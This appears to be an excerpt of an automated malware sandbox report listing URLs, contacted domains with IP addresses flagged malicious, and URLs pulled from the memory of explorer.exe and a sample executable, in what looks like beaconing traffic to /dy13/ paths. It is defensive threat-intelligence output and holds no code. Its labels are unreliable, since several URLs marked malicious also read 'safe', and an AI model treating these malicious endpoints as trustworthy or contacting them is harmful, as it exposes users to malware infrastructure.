http://www.real-estate-96841.bond/dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0	0%	Avira URL Cloud	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	Avira URL Cloud	safe
http://www.883106.photos/dy13/	0%	Avira URL Cloud	safe
https://excel.office.com	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	Avira URL Cloud	safe
http://www.sdplat.media	0%	Avira URL Cloud	safe
http://www.cpuk-finance.com	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	Avira URL Cloud	safe
http://www.umeshraja.com/dy13/?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG	0%	Avira URL Cloud	safe
http://www.484844.vip/dy13/www.manga-house.com	0%	Avira URL Cloud	safe
http://www.manga-house.comReferer:	0%	Avira URL Cloud	safe
http://www.acc-pay.top/dy13/www.umeshraja.com	0%	Avira URL Cloud	safe
http://www.883106.photos/dy13/?0N=AG4Ye1FrkmCiFPqbKlnZ1dM6YK/DoI/B/9McINMFJI+SypkU6UbY406xkx1Fqy5gp249&Cj9LK=8pm41D0p	0%	Avira URL Cloud	safe
http://www.taini00.netReferer:	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	Avira URL Cloud	safe
http://www.883106.photos	0%	Avira URL Cloud	safe
http://www.real-estate-96841.bondReferer:	0%	Avira URL Cloud	safe
http://www.soloparentconnect.com/dy13/	0%	Avira URL Cloud	safe
http://www.real-estate-96841.bond/dy13/www.taini00.net	0%	Avira URL Cloud	safe
http://www.acc-pay.top/dy13/	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://word.office.com	0%	Avira URL Cloud	safe
https://wns.windows.com/L	0%	Avira URL Cloud	safe
http://www.soloparentconnect.com/dy13/www.b0ba138.xyz	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	Avira URL Cloud	safe
http://www.tyupok.xyz/dy13/www.484844.vip	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	Avira URL Cloud	safe
http://www.soloparentconnect.com	0%	Avira URL Cloud	safe
http://www.taini00.net	0%	Avira URL Cloud	safe
http://schemas.micr	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Avira URL Cloud	safe
http://www.b0ba138.xyz/dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	Avira URL Cloud	safe
http://www.484844.vip	0%	Avira URL Cloud	safe
http://www.umeshraja.com	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	Avira URL Cloud	safe
http://www.freedompopo.com/dy13/www.bdsmnutzbar.info	0%	Avira URL Cloud	safe
http://www.883106.photos/dy13/www.tyupok.xyz	0%	Avira URL Cloud	safe
http://www.tyupok.xyz/dy13/	0%	Avira URL Cloud	safe
http://www.carefulapp.com	0%	Avira URL Cloud	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	Avira URL Cloud	safe
http://www.carefulapp.com/dy13/	0%	Avira URL Cloud	safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	0%	Avira URL Cloud	safe
http://www.sdplat.media/dy13/www.soloparentconnect.com	0%	Avira URL Cloud	safe
http://www.cpuk-finance.com/dy13/	0%	Avira URL Cloud	safe
https://outlook.com_	0%	Avira URL Cloud	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	Avira URL Cloud	safe
http://www.484844.vipReferer:	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	0%	Avira URL Cloud	safe
http://www.cpuk-finance.com/dy13/?Cj9LK=8pm41D0p&0N=gDxxMnt83apdqDd0VF+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOMA9Jp0yBU	0%	Avira URL Cloud	safe
http://www.b0ba138.xyzReferer:	0%	Avira URL Cloud	safe
http://www.real-estate-96841.bond	0%	Avira URL Cloud	safe
http://schemas.mi	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	0%	Avira URL Cloud	safe
http://www.imuschestvostorgov.onlineReferer:	0%	Avira URL Cloud	safe
http://www.taini00.net/dy13/	0%	Avira URL Cloud	safe
http://www.carefulapp.comReferer:	0%	Avira URL Cloud	safe
http://www.cpuk-finance.com/dy13/www.acc-pay.top	0%	Avira URL Cloud	safe
http://www.bdsmnutzbar.info/dy13/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	0%	Avira URL Cloud	safe
https://powerpoint.office.comcember	0%	Avira URL Cloud	safe
http://www.carefulapp.com/dy13/www.freedompopo.com	0%	Avira URL Cloud	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	Avira URL Cloud	safe
http://www.sdplat.media/dy13/	0%	Avira URL Cloud	safe
http://www.umeshraja.com/dy13/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.real-estate-96841.bond	185.53.179.90	true	true	unknown
umeshraja.com	3.33.130.190	true	true	unknown
soloparentconnect.com	3.33.130.190	true	true	unknown
www.b0ba138.xyz	104.21.74.89	true	true	unknown
reticulated-garbanzo-p6jx8r0u3hbz71yu1pcvzfk0.herokudns.com	3.226.182.14	true	true	unknown
www.cpuk-finance.com	185.151.30.212	true	true	unknown
2tduz67r.as66588.com	147.92.43.172	true	true	unknown
www.soloparentconnect.com	unknown	unknown	true	unknown
www.imuschestvostorgov.online	unknown	unknown	true	unknown
www.883106.photos	unknown	unknown	true	unknown
www.484844.vip	unknown	unknown	true	unknown
www.acc-pay.top	unknown	unknown	true	unknown
www.sdplat.media	unknown	unknown	true	unknown
www.taini00.net	unknown	unknown	true	unknown
www.umeshraja.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.sdplat.media/dy13/?Cj9LK=8pm41D0p&0N=ZKZE34nO5+VJCQ7V97/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx38H3jKbLJXyY	true	Avira URL Cloud: safe	unknown
http://www.real-estate-96841.bond/dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0	true	Avira URL Cloud: safe	unknown
http://www.umeshraja.com/dy13/?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG	true	Avira URL Cloud: safe	unknown
http://www.883106.photos/dy13/?0N=AG4Ye1FrkmCiFPqbKlnZ1dM6YK/DoI/B/9McINMFJI+SypkU6UbY406xkx1Fqy5gp249&Cj9LK=8pm41D0p	true	Avira URL Cloud: safe	unknown
http://www.b0ba138.xyz/dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h	true	Avira URL Cloud: safe	unknown
http://www.cpuk-finance.com/dy13/?Cj9LK=8pm41D0p&0N=gDxxMnt83apdqDd0VF+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOMA9Jp0yBU	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000005.00000003.3106253540.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4093721221.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426649414.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.manga-house.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bdsmnutzbar.info/dy13/H	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.umeshraja.comReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1665871823.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3427001072.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106606841.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.real-estate-96841.bond/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.883106.photosReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.acc-pay.top	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bdsmnutzbar.infoReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdplat.mediaReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.883106.photos/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cpuk-finance.comReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sdplat.media	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.484844.vip/dy13/www.manga-house.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taini00.netReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000005.00000000.1672208552.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cpuk-finance.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.manga-house.comReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.acc-pay.top/dy13/www.umeshraja.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.883106.photos	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soloparentconnect.com/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.real-estate-96841.bond/dy13/www.taini00.net	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.acc-pay.top/dy13/	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.real-estate-96841.bondReferer:	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000005.00000000.1672208552.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106196438.000000000C9E7000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000005.00000000.1672208552.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	explorer.exe, 00000005.00000000.1672208552.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4100977951.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soloparentconnect.com/dy13/www.b0ba138.xyz	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tyupok.xyz/dy13/www.484844.vip	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soloparentconnect.com	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taini00.net	explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000005.00000002.4093721221.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micr	explorer.exe, 00000005.00000000.1674090829.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4102382128.000000000CA63000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
